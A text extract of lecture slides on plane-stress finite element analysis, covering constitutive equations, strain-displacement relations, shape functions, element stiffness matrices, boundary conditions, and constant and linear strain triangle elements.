[English]\n\n• d‌y‌e s‌t‌r‌e‌a‌k‌s\n• t‌w‌o-l‌a‌y‌e‌r f‌l‌u‌i‌d\n• l‌a‌r‌g‌e s‌i‌l‌l" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6557135,"math_prob":0.9567672,"size":782,"snap":"2022-05-2022-21","text_gpt3_token_len":256,"char_repetition_ratio":0.102827765,"word_repetition_ratio":0.016949153,"special_character_ratio":0.19181585,"punctuation_ratio":0.03937008,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9551426,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-29T11:14:06Z\",\"WARC-Record-ID\":\"<urn:uuid:ab76ec53-ca54-40aa-bd03-2be4f2704e1e>\",\"Content-Length\":\"50215\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:165bb395-2fa3-4df7-9f91-8c9dcc1e37cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:65365193-40c8-4020-b271-58bdbd1e2406>\",\"WARC-IP-Address\":\"81.31.168.62\",\"WARC-Target-URI\":\"http://sjce.journals.sharif.edu/article_26.html\",\"WARC-Payload-Digest\":\"sha1:TRR5LAZ6TUJI2VW4Z5BM6QHXG7VV3X5F\",\"WARC-Block-Digest\":\"sha1:JXXAX7KWWG5RKH7NBQROPZS54OVCHHIG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662644142.66_warc_CC-MAIN-20220529103854-20220529133854-00214.warc.gz\"}"}
https://www.jiqizhixin.com/articles/2017-01-31
[ "# 《神经网络和深度学习》系列文章四十五:卷积神经网络在实际中的应用\n\n### 目录\n\n1、使用神经网络识别手写数字\n\n2、反向传播算法是如何工作的\n\n3、改进神经网络的学习方法\n\n4、神经网络可以计算任何函数的可视化证明\n\n5、为什么深度神经网络的训练是困难的\n\n6、深度学习\n\n• 介绍卷积网络\n• 卷积神经网络在实际中的应用\n• 卷积网络的代码\n• 图像识别领域中的近期进展\n• 其他的深度学习模型\n• 神经网络的未来\n\n``````>>> import network3\n>>> from network3 import Network\n>>> from network3 import ConvPoolLayer, FullyConnectedLayer, SoftmaxLayer\n>>> training_data, validation_data, test_data = network3.load_data_shared()\n>>> mini_batch_size = 10\n>>> net = Network([\nFullyConnectedLayer(n_in=784, n_out=100),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.1,\nvalidation_data, test_data)``````", null, "``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2)),\nFullyConnectedLayer(n_in=20*12*12, n_out=100),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.1,\nvalidation_data, test_data)``````\n\n• 如果你删除了全连接层,只使用卷积-混合层和柔性最大值层,你得到了什么样的分类准确率?全连接层的加入有帮助吗?\n\n``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2)),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2)),\nFullyConnectedLayer(n_in=40*4*4, n_out=100),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.1,\nvalidation_data, test_data)``````\n\n• 使用 tanh 激活函数    在本书前面我已经几次提起过 tanh 函数可以是一个比 S型函数更好的激活函数。我们还没有实际采用过这些建议,因为我们已经用 S 型取得了大量进展。但现在让我们试试一些用 tanh 作为我们激活函数的实验。试着训练卷积和全连接层中具有 tanh 激活值的网络。开始时使用 S 型网络中使用的相同的超参数,但是训练", null, "个迭代期,而不是", null, "个。你的网络表现得怎么样?如果你继续训练到", null, "个迭代期会怎样?试着将tanh和 S型网络的每个迭代期的验证准确率都绘制出来,都绘制到", null, "个迭代期。如果你的结果和我的相似,你会发现 tanh 网络训练得稍微快些,但是最终的准确率非常相似。你能否解释为什么 tanh 网络可以训练得更快?你能否用 S型取得一个相似的训练速度,也许通过改变学习速率,或者做些调整?试着用五六个迭代学习超参数和网络架构,寻找 tanh 优于 S 型的方面。注意:这是一个开放式问题。就我个人而言,我并没有找到太多切换为 tanh 的优势,虽然我没全面地做过实验,也许你会找到一个方法。无论如何,我们马上会发现切换到修正线性激活函数的一个优势,所以我们不会去深入使用 tanh 函数。\n\n``````>>> from network3 import ReLU\n>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(n_in=40*4*4, n_out=100, activation_fn=ReLU),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.03,\nvalidation_data, test_data, lmbda=0.1)``````\n\n``\\$ python expand_mnist.py``\n\n``````>>> expanded_training_data, _, _ = network3.load_data_shared(\n\"../data/mnist_expanded.pkl.gz\")\n>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(n_in=40*4*4, n_out=100, activation_fn=ReLU),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(expanded_training_data, 60, mini_batch_size, 0.03,\nvalidation_data, test_data, lmbda=0.1)``````\n\n• 卷积层的想法是以一种横跨图像不变的方式作出反应。它看上去令人惊奇,然而,当我们做完所有输入数据的转换,网络能学习得更多。你能否解释为什么这实际上很合理?\n\n``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 
5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(n_in=40*4*4, n_out=100, activation_fn=ReLU),\nFullyConnectedLayer(n_in=100, n_out=100, activation_fn=ReLU),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(expanded_training_data, 60, mini_batch_size, 0.03,\nvalidation_data, test_data, lmbda=0.1)``````\n\n``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(\nn_in=40*4*4, n_out=1000, activation_fn=ReLU, p_dropout=0.5),\nFullyConnectedLayer(\nn_in=1000, n_out=1000, activation_fn=ReLU, p_dropout=0.5),\nSoftmaxLayer(n_in=1000, n_out=10, p_dropout=0.5)],\nmini_batch_size)\n>>> net.SGD(expanded_training_data, 40, mini_batch_size, 0.03,\nvalidation_data, test_data)``````", null, "1.注意 network3.py 包含了源自 Theano 库文档中关于卷积神经网络(尤其是 LeNet-5 (http://deeplearning.net/tutorial/lenet.html) 的实现),Misha Denil 的 弃权的实现 (https://github.com/mdenil/dropout),以及 Chris Olah (http://colah.github.io/) 的概念。\n\n2.参见 Theano: A CPU and GPU Math Expression Compiler in Python (http://www.iro.umontreal.ca/~lisa/pointeurs/theano_scipy2010.pdf),作者为 James Bergstra, Olivier Breuleux, Frederic Bastien, Pascal Lamblin, fRavzan Pascanu, Guillaume Desjardins, Joseph Turian, David Warde-Farley, 和 Yoshua Bengio (2010)。 Theano 也是流行的 Pylearn2 (http://deeplearning.net/software/pylearn2/) 和 Keras (http://keras.io/) 神经网络库的基础。其它在本文写作时流行的神经网路库包括 Caffe (http://caffe.berkeleyvision.org/) 和 Torch (http://torch.ch/) 。\n\n3.当我发布这一章时,Theano 的当前版本变成了 0.7。我实际上已经在 Theano 0.7 版本中重新运行过这些例子并取得了和文中非常相似的结果。\n\n4.本节中的实验代码可以在 https://github.com/mnielsen/neural-networks-and-deep-learning/blob/master/src/conv.py 这个脚本中找到。注意,脚本中的代码只是简单地重复并相对于本节中的讨论。\n\n5.实际上,在这个实验中我其实对这个架构的网络运行了三次独立的训练。然后我从这三次运行中报告了对应于最佳验证准确率的测试准确率。利用多次运行有助于减少结果中的变动,\n\n6.这里我继续使用一个大小为 10 的小批量数据。正如我们前面讨论过的,使用更大的小批量数据可能提高训练速度。我继续使用相同的小批量数据,主要是为了和前面章节中的实验保持一致。\n\n7.如果输入图像是有颜色的,这个问题会在第一层中出现。在这种情况下,对于每一个像素我们会有 3个输入特征,对应于输入图像中的红色、绿色和蓝色通道。因此我们将允许特征检测器可访问所有颜色信息,但仅仅在一个给定的局部感受野中。\n\n8.注意你可以将 activation_fn=tanh 作为一个参数传递给 ConvPoolLayer 和 FullyConnectedLayer 类。\n\n9.你也许可以回想  来找灵感。\n\n10.“Gradient-based learning applied to document recognition”(http://yann.lecun.com/exdb/publis/pdf/lecun-98.pdf),作者为 Yann LeCun, Léon Bottou, Yoshua Bengio, 和 Patrick Haffner (1998)。细节上有很多不同,但大体上讲,我们的网络和论文中描述的网络非常相似。\n\n11.一个通常的理由是 max(0,z) 在 z 取最大极限时不会饱和,不像 S 型神经元,而这有助于修正线性单元持续学习。到目前为止,这一辩解很好,但不是一个详细的理由,更多的是一个“就这样”的故事。注意我们在第二章里讨论过饱和的问题。\n\n12. expand_mnist.py 的代码可以从 https://github.com/mnielsen/neural-networks-and-deep-learning/blob/master/src/expand_mnist.py 这里获取。\n\n13. Best Practices for Convolutional Neural Networks Applied to Visual Document Analysis (http://dx.doi.org/10.1109/ICDAR.2003.1227801),作者为 Patrice Simard, Dave Steinkraus, 和 John Platt (2003)。\n\n14. Deep, Big, Simple Neural Nets Excel on Handwritten Digit Recognition\n\n(http://arxiv.org/abs/1003.0358),作者为 Dan Claudiu Cireșan, Ueli Meier,Luca Maria Gambardella, 和 Jürgen Schmidhuber (2010)。", null, "", null, "", null, "" ]
[ null, "https://pic.36krcnd.com/201708/08095228/7iyvostw9sm1yom3", null, "https://pic.36krcnd.com/201708/08095228/w1pzhyemjx2uwaln", null, "https://pic.36krcnd.com/201708/08095227/gg42hvf72cd1ymsh", null, "https://pic.36krcnd.com/201708/08095227/gg42hvf72cd1ymsh", null, "https://pic.36krcnd.com/201708/08095227/gg42hvf72cd1ymsh", null, "https://pic.36krcnd.com/201708/08095244/rolfu04ajcfbu0kd", null, "https://image.jiqizhixin.com/uploads/wangeditor/e7406ee5-c588-46e3-846d-24f0d7414b16/5976200000.png", null, "https://image.jiqizhixin.com/uploads/special_column/avatar/5b5e805b-7952-4dc8-a701-3b7699934c7a/avatar-1659ffc1-a6ae-425c-aaa4-764de8d246d3.png", null, "https://cdn.jiqizhixin.com/assets/comment_none-5e1197d791fbe4840c7b95207c03e1e846ffcc6cf5060aab501cc39ac508b3ae.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9668645,"math_prob":0.96169823,"size":14211,"snap":"2019-43-2019-47","text_gpt3_token_len":10764,"char_repetition_ratio":0.114732176,"word_repetition_ratio":0.20403321,"special_character_ratio":0.22742945,"punctuation_ratio":0.16223133,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9767768,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,5,null,5,null,null,null,null,null,null,null,5,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T04:17:47Z\",\"WARC-Record-ID\":\"<urn:uuid:b4350f5c-20fb-458a-942b-79363f6cd81e>\",\"Content-Length\":\"58194\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7f55fcaa-5150-4d13-905d-55145524761a>\",\"WARC-Concurrent-To\":\"<urn:uuid:b8d76e28-ee49-4445-b859-47e6ec711693>\",\"WARC-IP-Address\":\"39.106.131.93\",\"WARC-Target-URI\":\"https://www.jiqizhixin.com/articles/2017-01-31\",\"WARC-Payload-Digest\":\"sha1:AS2HF3HJDZYIQVKAGFVJL2Q7RNWADFA4\",\"WARC-Block-Digest\":\"sha1:WUS4KMIWHT6MRFCVENZ47XK7PR3ODLJS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670729.90_warc_CC-MAIN-20191121023525-20191121051525-00471.warc.gz\"}"}
https://www.time4learning.com/homeschool-curriculum/middle-school/eighth-grade/math-lesson-plans.html
[ "# Eighth Grade Math Curriculum and Lesson Plans\n\nEighth-grade math is typically a course in pre-algebra to help prepare students for high school algebra. Our 8th-grade math curriculum can be used either as a main homeschool program or as a supplement to another homeschool curriculum or a traditional school. The following information will explain what steps you should take to meet your child’s 8th-grade math goals and objectives and how our 8th-grade math curriculum can help.\n\nAn 8th-grade math program should cover various areas of mathematics, not just arithmetic. The primary strands for an 8th-grade math curriculum are number sense and operations, algebra, geometry, and spatial sense, measurement, and data analysis and probability. While these math strands might surprise you, they are all critical lessons for an 8th-grade math curriculum.\n\nThese skills will improve math fluency and help build upon the math facts, concepts, and strategies acquired in the past, making future success more achievable. Here are some topics that eighth graders should already know in math:\n\n• Writing numbers in word, standard, expanded, and scientific notation\n• Identifying and using ratios and rates\n• Multiplying and dividing with positive and negative rational numbers\n• Finding the perimeter and area of two-dimensional figures\n• Identifying and plotting ordered pairs in four quadrants and along the axes\n• Calculating probabilities of independent and dependent events\n\nThe following is a general list of some math learning objectives eighth graders should attain:\n\nIdentify rational and irrational numbers and describe meanings.\nCalculate and approximate principal square roots.\nIdentify and perform transformations of a figure on a coordinate plane.\nSolve problems in two variables using linear equations.\nDefine and differentiate between different types of sampling techniques.\nUse technology to determine the mean, median, mode, and range of a set of real-world data.\n\n## Eighth-Grade Math Scope & Sequence\n\n#### Lesson 1: Scientific Notation\n\nExpress numbers between zero and one in scientific notation.\n\n#### Lesson 2: Rational and Irrational Numbers\n\nIdentify rational and irrational numbers and describe meanings.\n\n#### Lesson 3: Absolute Value\n\nIdentify and explain absolute value.\n\n#### Lesson 1: Comparing Large Numbers in Scientific Notation\n\nCompare large numbers in scientific notation.\n\n#### Lesson 2: Comparing Small Numbers in Scientific Notation\n\nCompare small numbers in scientific notation.\n\n#### Lesson 3: Adding and Subtracting Numbers in Scientific Notation\n\nAdd and subtract numbers in scientific notation.\n\n#### Lesson 4: Using Scientific Notation with Technology\n\nUse scientific notation with technology\n\n#### Lesson 1: Repeating Decimals to Fractions\n\nConvert repeating decimals to fractions.\n\n#### Lesson 2: Roots\n\nCalculate and approximate principal square roots.\n\n#### Lesson 3: Using Roots to Solve Equations\n\nUse roots to solve equations.\n\n#### Lesson 4: Compare and Order\n\nCompare and order numbers in many forms including: fractions, decimals, scientific notation, absolute value, and radicals.\n\n#### Lesson 5: Estimation\n\nUse estimation for situations using real numbers.\n\n#### Lesson 6: Properties\n\nApply properties to solve problems with real numbers.\n\n#### Lesson 7: Real Number Operations\n\nSimplify numerical expressions with real numbers.\n\n#### Lesson 1: Divisibility Rules\n\nUse divisibility rules to solve problems.\n\n#### 
Lesson 2: Multiple Representations\n\nRepresent numbers in base ten in other bases (two, five, and eight) and vice versa.\n\n#### Lesson 3: Prime and Composite\n\nIdentify numbers as relatively prime.\n\n#### Lesson 1: Rate of Change\n\nDescribe and use rate of change to solve problems.\n\n#### Lesson 2: Proportions\n\nUse proportional relationships to find measures of length, weight or mass, and capacity or volume.\n\n#### Lesson 3: Percents\n\nSolve real world problems involving percents greater than 100.\n\n#### Lesson 4: Comparing Two Proportional Relationships\n\nCompare two proportional relationships.\n\n#### Lesson 1: Operations\n\nSolve real world problems with rational numbers (including integers, decimals and fractions).\n\n#### Lesson 2: Real World Problems\n\nSolve real world problems with ratios, rates, proportions, and percents.\n\n#### Lesson 3: Multi-Step Problems\n\nSolve real world two- or three- step problems with integers, decimals, fractions, ratios, rates, proportions, and percents.\n\n#### Lesson 1: Expressions\n\nSubstitute rational numbers into expressions and evaluate.\n\n#### Lesson 2: Expressions with Exponents\n\nSubstitute rational numbers into expressions with exponents and radicals.\n\n#### Lesson 3: Expressions and Equations\n\nTranslate word expressions and equations into algebraic expressions and equations (including one or more variables and exponents).\n\n#### Lesson 4: Expressions, Equations, and Inequalities\n\nTranslate verbal expressions and sentences into algebraic inequalities and vice versa.\n\n#### Lesson 5: Real World Expressions\n\nUse variables to represent unknown quantities in real world situations.\n\n#### Lesson 6: Simplify\n\nCombine and simplify algebraic expressions with a maximum of two variables.\n\n#### Lesson 7: Substitution\n\nEvaluate algebraic expressions and equations by substituting integral values for variables and simplifying.\n\n#### Lesson 8: Inequalities\n\nSolve linear inequalities in one variable algebraically.\n\n#### Lesson 1: Identifying the Number of Solutions in a Linear Equation\n\nIdentify the number of solutions in a linear equation.\n\n#### Lesson 2: Solving Equations with Variables on Both Sides\n\nSolve equations with variables on both sides.\n\n#### Lesson 3: Solving Equations Requiring the Distributive Property\n\nSolve equations requiring the distributive property.\n\n#### Lesson 4: Solving Equations Requiring Combining Like Terms\n\nSolve equations requiring combining like terms.\n\n#### Lesson 1: Analyzing Systems of Equations\n\nAnalyze systems of equations.\n\n#### Lesson 2: Identifying the Number of Solutions in a Linear Equation\n\nIdentify the number of solutions in a linear equation.\n\n#### Lesson 1: Geometric Properties\n\nUse properties of parallelism, perpendicularity, and symmetry to solve real world problems.\n\n#### Lesson 2: Polygons\n\nCompare and describe properties of convex and concave polygons.\n\n#### Lesson 3: Pythagorean Theorem\n\nApply the Pythagorean theorem to solve real world problems.\n\n#### Lesson 4: Congruent and Similar\n\nIdentify congruence and similarity in real world situations and justify.\n\n#### Lesson 5: Transformations\n\nIdentify and perform transformations (reflection, translation, rotation, and dilation) of a figure on a coordinate plane.\n\n#### Lesson 6: Proportional Relationships\n\nIdentify how changes in dimensions affect area and perimeter.\n\n#### Lesson 1: Transforming Lines and Line Segments\n\nTransform lines and line segments.\n\n#### Lesson 2: 
Transforming Angles\n\nTransform angles.\n\n#### Lesson 3: Transforming Parallel Lines\n\nTransform parallel lines.\n\n#### Lesson 4: Understanding Congruence\n\nUnderstand congruence.\n\n#### Lesson 5: Using a Sequence of Transformations\n\nUse a sequence of transformations.\n\n#### Lesson 6: Understanding Similar Figures\n\nUnderstand similar figures.\n\n#### Lesson 7: Describing Sequences of Transformations that Show Similarity\n\nDescribe sequences of transformations that show similarity.\n\n#### Lesson 1: Proving Triangle Theorems Informally\n\nProve triangle theorems informally.\n\n#### Lesson 2: Understanding Angles Formed When Parallel Lines are Cut by a Transversal\n\nUnderstand angles formed when parallel lines are cut by a transversal.\n\n#### Lesson 3: Exploring Angle-Angle Similarity\n\nExplore angle-angle similarity.\n\n#### Lesson 1: Using the Converse of the Pythagorean Theorem\n\nUse the converse of the Pythagorean theorem.\n\n#### Lesson 2: Applying the Pythagorean Theorem in Three Dimensions\n\nApply the Pythagorean theorem in three dimensions.\n\n#### Lesson 3: Applying the Pythagorean Theorem in the Coordinate Plane\n\nApply the Pythagorean theorem in the coordinate plane.\n\n#### Lesson 1: Volume\n\nFind the volume of pyramids, prisms, and cones.\n\n#### Lesson 2: Applying Volume Formulas\n\nApply volume formulas.\n\n#### Lesson 3: Surface Area\n\nFind the surface area of pyramids, prisms, and cones.\n\n#### Lesson 4: Regular and Irregular Polygons\n\nCompare regular and irregular polygons.\n\n#### Lesson 5: Angle Measure\n\nFind the angle measure in two-dimensional figures and two-dimensional sides of three-dimensional figures based on geometric relationships.\n\n#### Lesson 6: Proportional Relationships\n\nIdentify the relationship between volume or surface area and dimension.\n\n#### Lesson 1: Scale\n\nInterpret and apply various scales including number lines, graphs, models, and maps.\n\n#### Lesson 2: Estimation\n\nSelect tools to measure quantities and dimensions to a specified degree of accuracy and determine the greatest possible error of measurement.\n\n#### Lesson 3: Significant Digits\n\nIdentify the number of significant digits as related to the least precise unit of measure and apply to real world contexts.\n\n#### Lesson 1: Tables and Ordered Pairs\n\nUse a table to find ordered pair solutions of a linear equation in slope-intercept form.\n\n#### Lesson 2: Equations to Lines\n\nGraph linear equations in standard form.\n\n#### Lesson 3: Linear Inequalities\n\nIdentify and graph inequalities on a number line.\n\n#### Lesson 4: Inequalities\n\nIdentify and graph inequalities in the coordinate plane.\n\n#### Lesson 5: Applications of Linear Inequalities\n\nSolve problems in two variables using linear inequalities.\n\n#### Lesson 1: x- and y- Intercepts\n\nGiven the graph of a linear relationship, determine the x- and y- intercepts.\n\n#### Lesson 2: Slope of a Line\n\nGiven the graph of a line, determine the slope.\n\n#### Lesson 3: Write Equations in Slope-Intercept Form\n\nGiven the slope and y-intercept, write an equation.\n\n#### Lesson 4: Find a Function Rule\n\nFind a function rule to describe a linear relationship using tables of related input-output variables.\n\n#### Lesson 5: Determine if a Function is Linear\n\nUsing information from a table, graph, or rule, determine if a function is linear and justify.\n\n#### Lesson 1: Graphing Proportional Relationships and Interpreting Slope\n\nGraph proportional relationships and interpreting slope.\n\n#### 
Lesson 2: Using Similar Triangles to Understand Slope\n\nUse similar triangles to understand slope.\n\n#### Lesson 3: Using Slope-Intercept Form\n\nUse slope-intercept form.\n\n#### Lesson 4: Interpreting y = mx + b as a Linear Function\n\nInterpret y = mx + b as a linear function.\n\n#### Lesson 1: Recognizing Functions\n\nRecognize functions.\n\n#### Lesson 2: Comparing Functions Represented in Different Forms\n\nCompare functions represented in different forms.\n\n#### Lesson 3: Interpreting y = mx + b as a Linear Function\n\nInterpret y = mx + b as a linear function.\n\n#### Lesson 4: Constructing Linear Functions\n\nConstruct linear functions.\n\n#### Lesson 5: Describing a Functional Relationship by Analyzing a Graph\n\nDescribe a functional relationship by analyzing a graph.\n\n#### Lesson 6: Sketching Graphs of Functions\n\nSketch graphs of functions.\n\n#### Lesson 1: Conditional Probability\n\nCalculate conditional probabilities and the probabilities of dependent events.\n\n#### Lesson 2: Sampling Techniques\n\nDefine and differentiate between different types of sampling techniques.\n\n#### Lesson 3: Apply Sampling\n\nUse different types of sampling techniques to collect data.\n\n#### Lesson 4: Sample Bias\n\nIdentify whether a sample is biased.\n\n#### Lesson 1: Data Representations\n\nInterpret circle, line, bar, histogram, stem-and-leaf, and box-and-whisker graphs including how different displays lead to different interpretations.\n\n#### Lesson 2: Statistics\n\nIdentify and explain how statistics and graphs can be used in misleading ways.\n\n#### Lesson 3: Mean, Median and Mode\n\nDetermine appropriate measures of central tendency for a given situation or set of data.\n\n#### Lesson 4: Technology\n\nUse technology to determine the mean, median, mode, and range of a set of real world data.\n\n## Why Choose Time4Learning Eighth-Grade Math Homeschool Curriculum\n\nOur 8th-grade online math curriculum can be used as a main homeschool program or to supplement other curricula or school. Time4Learning’s adaptable program allows students to work across grade levels. For example, if your student is “at-level” in language arts but ahead in math, they could use the eighth-grade language arts curriculum and the suggested 9th-grade math curriculum.\n\nIf your eighth grader is struggling to prepare for high school math, Time4Learning’s curriculum can be used as a supplement to get back on track. You can use our eighth-grade math lesson plans to locate specific topics that your student needs to review. Additionally, our automated grading and recordkeeping system saves you time and helps you easily keep track of your child’s progress.\n\nPreK - 8th\n\n\\$24.95\n• Monthly, first student\n• (\\$14.95/mo for each additional PreK-8th student)\n\n9th - 12th\n\n\\$34.95\n• Monthly, per student\n• (\\$14.95/mo for each additional PreK-8th student)\n\nNow Is the Time to Get Started!\n\nStart • Stop • Pause Anytime\n\nTOP" ]
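As a small illustration of the last data-analysis objective above (using technology to determine the mean, median, mode, and range of a set of real-world data), the snippet below shows one way those values could be checked. It is an illustrative sketch only, not part of the Time4Learning materials, and the temperature list is invented sample data.

```python
from statistics import mean, median, mode

# Invented sample data: daily high temperatures (degrees F) for one week.
temps = [68, 71, 75, 71, 79, 82, 71]

print("mean  :", round(mean(temps), 1))    # 73.9
print("median:", median(temps))            # 71
print("mode  :", mode(temps))              # 71 (appears three times)
print("range :", max(temps) - min(temps))  # 82 - 68 = 14
```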
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86175126,"math_prob":0.944081,"size":8882,"snap":"2023-14-2023-23","text_gpt3_token_len":1658,"char_repetition_ratio":0.12739356,"word_repetition_ratio":0.08242613,"special_character_ratio":0.1739473,"punctuation_ratio":0.11914324,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989109,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-04T04:02:51Z\",\"WARC-Record-ID\":\"<urn:uuid:2986adf2-6e45-4219-8412-81cf6215b682>\",\"Content-Length\":\"126791\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:282023dd-8bba-434c-85b2-6299c88be70e>\",\"WARC-Concurrent-To\":\"<urn:uuid:68148dfd-6527-4352-a680-9e183a58fc94>\",\"WARC-IP-Address\":\"172.67.21.14\",\"WARC-Target-URI\":\"https://www.time4learning.com/homeschool-curriculum/middle-school/eighth-grade/math-lesson-plans.html\",\"WARC-Payload-Digest\":\"sha1:JRCWSZLDSUVDSXS2IKPIFRB7RNZCTQGJ\",\"WARC-Block-Digest\":\"sha1:G3JZP2C45F3NIGYBEZ3FMNJXJ3AP4FY2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649439.65_warc_CC-MAIN-20230604025306-20230604055306-00336.warc.gz\"}"}
https://fdocument.org/document/plane-problems-constitutive-equations-ufl-plane-problems-constitutive-equations.html
[ "### Transcript of Plane Problems: Constitutive Equations - UFL (PDF)\n\n• 1\n\nPlane Problems: Constitutive Equations\n\nConstitutive equations for a linearly elastic and isotropic material in plane stress (i.e., $\sigma_z = \tau_{xz} = \tau_{yz} = 0$):\n\nwhere the last column has the initial (thermal) strains, which are $\varepsilon_{x0} = \varepsilon_{y0} = \alpha \Delta T$, $\gamma_{xy0} = 0$.\n\nRewriting in a compact form and solving for the stress vector,\n\nwhere\n\n• 2\n\nPlane Problems: Approximate Strain-Displacement Relations\n\nFrom the above, by definition\n\n$\varepsilon_x = \partial u / \partial x$, $\varepsilon_y = \partial v / \partial y$, $\gamma_{xy} = \partial u / \partial y + \partial v / \partial x$\n\n• 3\n\nPlane Problems: Strain-Displacement Relations\n\nAs the size of the rectangle goes to zero, in the limit,\n\n• 4\n\nPlane Problems: Displacement Field Interpolated\n\nInterpolating the displacement field, u(x,y) and v(x,y), in the plane finite element from nodal displacements,\n\nwhere entries of matrix N are the shape (interpolation) functions Ni. From the previous two equations,\n\nwhere B is the strain-displacement matrix.\n\n• 5\n\nStiffness Matrix and strain energy\n\nStrain energy density of an elastic material (energy/volume)\n\n$U_0 = \tfrac{1}{2} \varepsilon^T E \varepsilon$\n\nIntegrating over the element volume, the total strain energy is\n\n$U = \tfrac{1}{2} \int \varepsilon^T E \varepsilon \, dV = \tfrac{1}{2} d^T \left( \int B^T E B \, dV \right) d$\n\nwhere the term in parentheses is identified to be the element stiffness matrix.\n\nThe strain energy then becomes\n\n$U = \tfrac{1}{2} d^T k d = \tfrac{1}{2} d^T r$\n\nwhere the term on the right is the total work done on the element.\n\n• 6\n\nImportant Note on interpolation (shape) functions\n\nObserve that, for a given material, the stiffness matrix k (and, therefore, the behavior of an element) depends solely on N, the interpolation functions, and the differential operator $\partial$. The latter prescribes the differentiations which define strains in terms of displacements.\n\n$k = \int B^T E B \, dV$, $B = \partial N$\n\nThe variation of the shape functions in the element compared to actual variations of the true displacements determines the element size required for good accuracy. Low-order shape functions will require smaller elements than higher-order shape functions.\n\n• 7\n\nLoads and Boundary Conditions\n\nSurface tractions: distributed loads on a boundary of a structure; e.g., pressure. Body forces: loads acting on every particle of the structure; e.g., acceleration (gravitational or otherwise), magnetic forces. Concentrated forces and moments.\n\nBoundary conditions on various segments of the surface:\n\nA to B: free. B to C: normal traction (pressure)\n\nC to D: shear traction. D to A: zero displacements (dofs=0)\n\n• 8\n\nConstant Strain Triangle (CST)\n\nThe sequence 123 in node numbers must go counterclockwise around the element. Linear displacement field in terms of generalized coordinates $\alpha_i$:\n\nThen, the strains are (constant within the element!!)\n\n• 9\n\nConstant Strain Triangle (CST): Stiffness Matrix\n\nStrain-displacement relation, $\varepsilon = B d$, for the CST element\n\nwhere 2A is twice the area of the triangle and $x_{ij} = x_i - x_j$, etc.\n\nFrom the general formula\n\n$k = B^T E B \, t A$\n\nwhere t: element thickness (constant)\n\nNOTE: To represent a high strain gradient will require a very large number of small CST elements\n\n• 10\n\nLinear Strain Triangle (LST)\n\nThe element has six nodes and 12 dof. 
